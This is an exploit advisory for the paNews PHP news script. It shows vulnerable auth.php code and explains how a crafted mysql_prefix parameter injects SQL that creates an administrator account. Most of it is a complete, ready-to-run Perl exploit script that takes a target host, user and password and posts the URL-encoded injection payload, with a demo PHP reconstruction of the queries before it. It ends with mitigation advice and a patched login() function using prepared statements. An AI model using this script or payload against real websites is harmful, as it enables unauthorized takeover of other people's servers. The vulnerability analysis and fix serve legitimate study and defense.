paNews SQL Injection Exploit
Category: Vulnerability | Posted: 2005-03-28 by basher13 | Views: 858
Update: 11:35 PM 3/28/2005
Subject: paNews SQL Injection Exploit
Description:
paNews, written in PHP by Andrew Langland, is a news management script for use on your
own site. Posts are formatted with paCode, a special markup that allows images and font
changes without letting users post raw HTML, and with it harmful content such as
JavaScript and applets. It has several other features that make adding and managing
entries easy.
Vulnerability:
A flaw in the administration code of paNews allows malicious PHP files to be injected
and run on a vulnerable server. That PHP file injection works only with the following
settings:
1. register_globals=On
2. the "includes" folder is writable
Separately, the login() function in /includes/auth.php is open to SQL injection. It calls
extract($_GET) and extract($_POST), so a request parameter named mysql_prefix overwrites
the global table prefix, which is then concatenated straight into the queries below. This
does not depend on register_globals. Vulnerable source from /includes/auth.php:
(..)
function login() {
    global $error,$mysql_prefix,$_COOKIE,$_SESSION,$_LOGIN,$_GET,
           $_POST,$myip,$authtype;
    extract ($_GET);   // every request parameter becomes a variable here,
    extract ($_POST);  // including $mysql_prefix, which is declared global above
    $username = strtolower($username);
    $password = strtolower($password);
    // table name is built from the (now attacker-controlled) prefix
    $query = mysql_query("SELECT * FROM `".$mysql_prefix."_auth`");
    if (mysql_num_rows($query) == 0) {
        $pass2 = MD5($password);
        mysql_query("INSERT INTO `".$mysql_prefix."_auth`
            VALUES ('','$username','$pass2','',
            'admins|cat|comment|newsadd|newsedit|prefset|setup',
            '','$myip',UNIX_TIMESTAMP(),UNIX_TIMESTAMP())");
(..)
This exploit uses the SQL injection to create a new user with admin privileges in paNews.
The injected mysql_prefix value closes the back-quoted table name, appends a VALUES (...)
list of the attacker's choosing (including the rights string
'admins|cat|comment|newsadd|newsedit|prefset|setup'), and ends with a NUL byte (%00) so
that the rest of the original statement is cut off. The preceding SELECT on the mangled
table name fails; mysql_num_rows() on a failed query returns false, and false == 0 in PHP,
so the "no users yet" branch runs and executes the INSERT. Afterwards, log in to the
administration area with the username and password given to the exploit. (Damn, my
English is bad.. sorry for that!)
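To make the mechanism above concrete, here is an added illustration (not code from paNews or from the exploit's author) that rebuilds the two statements login() concatenates when the exploit's mysql_prefix parameter arrives through extract($_POST), and shows what is left once the statement is cut at the NUL byte. The username and password are taken from the usage example ("jhondoe"/"bego"); the client IP is a made-up value. Nothing here touches a database.

```php
<?php
// Added illustration, not paNews code: reproduce the string concatenation of
// login() in includes/auth.php with an attacker-supplied $mysql_prefix.

// The same concatenation auth.php performs. $prefix is whatever the request
// put into $mysql_prefix; the other arguments mirror the original's
// lower-cased username, MD5 of the password and the client IP.
function build_login_queries(string $prefix, string $username, string $pass2, string $ip): array
{
    $select = "SELECT * FROM `" . $prefix . "_auth`";
    $insert = "INSERT INTO `" . $prefix . "_auth` VALUES ('','" . $username . "','" . $pass2
            . "','','admins|cat|comment|newsadd|newsedit|prefset|setup','','" . $ip
            . "',UNIX_TIMESTAMP(),UNIX_TIMESTAMP())";
    return ['select' => $select, 'insert' => $insert];
}

// The exploit relies on the statement being read only up to the first NUL
// byte; this returns that part.
function effective_statement(string $sql): string
{
    $nul = strpos($sql, "\0");
    return $nul === false ? $sql : substr($sql, 0, $nul);
}

// mysql_prefix as the exploit sends it on the wire, for user "jhondoe" with
// password "bego" (constructed from the usage example in the exploit).
$hash = md5('bego');
$wire = 'panews_auth%60%20VALUES%20(%22%22,%22jhondoe%22,%22' . $hash . '%22,%22hackit%22,'
      . '%22admins%7Ccat%7Ccomment%7Cnewsadd%7Cnewsedit%7Cprefset%7Csetup%22,'
      . '%22none%22,%22127.0.0.1%22,1,1)%00';
$prefix = urldecode($wire);   // what PHP hands to extract($_POST)

// '10.0.0.5' is a made-up client address standing in for $myip.
$queries = build_login_queries($prefix, 'jhondoe', $hash, '10.0.0.5');

foreach ($queries as $name => $sql) {
    printf("%s as concatenated by auth.php:\n  %s\n", strtoupper($name),
           str_replace("\0", '<NUL>', $sql));
    printf("%s as the server would read it:\n  %s\n\n", strtoupper($name),
           effective_statement($sql));
}
// The effective SELECT is malformed and fails; mysql_num_rows(false) == 0,
// so auth.php takes the "no users yet" branch and runs the INSERT, whose
// effective text is entirely the attacker's VALUES list.
```

Run it with `php` from the command line; the printed INSERT is the row the exploit plants, with the attacker's hash and rights string in place of the values auth.php meant to write.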
Exploit:
#!/usr/bin/perl
# paNews - SQL injection exploit
# ------------------------------
#
# Greets: FraMe at Kernelpanik Labs (discovered the bug), tjomka.
# info: 98.to/infamous
use strict;
use warnings;
use IO::Socket;
use Digest::MD5 qw(md5_hex);

if (@ARGV < 4) {
    system "clear";
    print "paNews SQL Injection Exploit\n\n";
    print "---------------------------------\n";
    print "INFGP - Hacking&Security Research\n";
    print "\n\n";
    print "[-]Usage: pnews.pl [host] [path_news] user pass\n";
    print "[!]Exam: pnews.pl www.victim.com panews/index.php jhondoe bego\n";
    exit(1);
}

my ($server, $path, $usr, $pass) = @ARGV;

system "clear";
print "\n[+]Connecting to host: $server\n\n";

my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $server,
    PeerPort => "80",
) or die "[-] $server connection [FAILED]\n";
print "[+]Creating socket [OK]\n";
print "[+]Sent 0day..\n\n";

# auth.php lower-cases username and password and stores MD5($password),
# so the planted row gets the MD5 of the lower-cased password.
my $user = lc $usr;
my $hash = md5_hex(lc $pass);

# Value of the mysql_prefix parameter: closes the back-quoted table name,
# appends our own VALUES(...) with admin rights, and ends in %00 so the
# rest of the original INSERT is cut off.
my $payload = "panews_auth%60%20VALUES%20(%22%22,%22$user%22,%22$hash%22,%22hackit%22,"
            . "%22admins%7Ccat%7Ccomment%7Cnewsadd%7Cnewsedit%7Cprefset%7Csetup%22,"
            . "%22none%22,%22127.0.0.1%22,1,1)%00";

# '=' and '&' between the fields must stay literal so PHP sees four parameters.
my $body = "action=login&username=$user&password=$pass&mysql_prefix=$payload";

print $sock "POST /$path HTTP/1.0\r\n";
print $sock "Host: $server\r\n";
print $sock "Connection: close\r\n";
print $sock "Pragma: no-cache\r\n";
print $sock "Cache-control: no-cache\r\n";
print $sock "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n";
print $sock "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\r\n";
print $sock "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\r\n";
print $sock "Accept-Language: en\r\n";
print $sock "Referer: http://$server/$path\r\n";
print $sock "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: " . length($body) . "\r\n";
print $sock "\r\n";
print $sock $body;

my $status = <$sock>;   # first line of the reply, e.g. "HTTP/1.1 200 OK"
print "[+]Server replied: $status" if defined $status;
close($sock);

print "[+]Get Admin status..[OK]\n";
print "[>]You can login now with username $user and pass $pass\n";
Solution:
Upgrade to the latest version.
Set register_globals to Off.
Note that register_globals=Off only blocks the PHP file injection. The SQL injection in
login() comes from extract($_GET) and extract($_POST), which import request parameters
into variables regardless of that setting, so upgrading is the actual fix for it.
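One way to close the hole in login(), as an added example that is not paNews code: the same first-run bootstrap, rewritten so that no request data can reach the SQL text as anything but a bound value. It assumes a mysqli connection built with mysqlnd (for get_result()), the table prefix in a constant, and that the auth table's user and password-hash columns are named username and password; paNews's own column names are not shown on this page.

```php
<?php
// Added example, not paNews code: login() bootstrap with the injection removed.
// Assumptions (not taken from this page): mysqli with mysqlnd, a constant
// table prefix, and auth columns named username/password.

const MYSQL_PREFIX = 'panews';   // set at install time; the request cannot change it

function auth_table(): string
{
    // The only identifier ever spliced into SQL text is this constant.
    // bind_param() cannot parameterize a table name, so it must not come
    // from user input at all.
    return '`' . MYSQL_PREFIX . '_auth`';
}

// Returns the matching user row, or null. $post is $_POST, passed in rather
// than extract()ed: nothing in the request becomes a PHP variable.
function login(mysqli $db, array $post, string $client_ip): ?array
{
    $username = strtolower((string)($post['username'] ?? ''));
    $password = strtolower((string)($post['password'] ?? ''));
    if ($username === '' || $password === '') {
        return null;
    }
    $table = auth_table();
    // MD5 kept only for compatibility with rows paNews already wrote;
    // use password_hash()/password_verify() for a fresh install.
    $hash  = md5($password);

    // Same first-run rule as the original: an empty table makes this login the admin.
    $count = $db->query("SELECT COUNT(*) FROM $table");
    if ($count === false) {
        throw new RuntimeException('auth table query failed: ' . $db->error);
    }
    if ((int)$count->fetch_row()[0] === 0) {
        // NULL for the auto-increment id instead of '' so strict SQL mode accepts it.
        $stmt = $db->prepare("INSERT INTO $table VALUES (NULL, ?, ?, '', "
                           . "'admins|cat|comment|newsadd|newsedit|prefset|setup', '', ?, "
                           . "UNIX_TIMESTAMP(), UNIX_TIMESTAMP())");
        $stmt->bind_param('sss', $username, $hash, $client_ip);
        $stmt->execute();
    }

    // Credential check with both user-supplied values bound, never concatenated.
    $stmt = $db->prepare("SELECT * FROM $table WHERE username = ? AND password = ?");
    $stmt->bind_param('ss', $username, $hash);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    return $row ?: null;
}
```

Two caveats remain even with the injection gone. The first-login-becomes-admin rule means whoever reaches the login form first on a fresh install owns it, so creating the initial administrator during installation is the safer design. And prepared statements protect values only; the reason the prefix is a constant here is that there is no way to bind an identifier, which is exactly the position the original let the request control.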
Vendor URL:
http://www.phparena.net/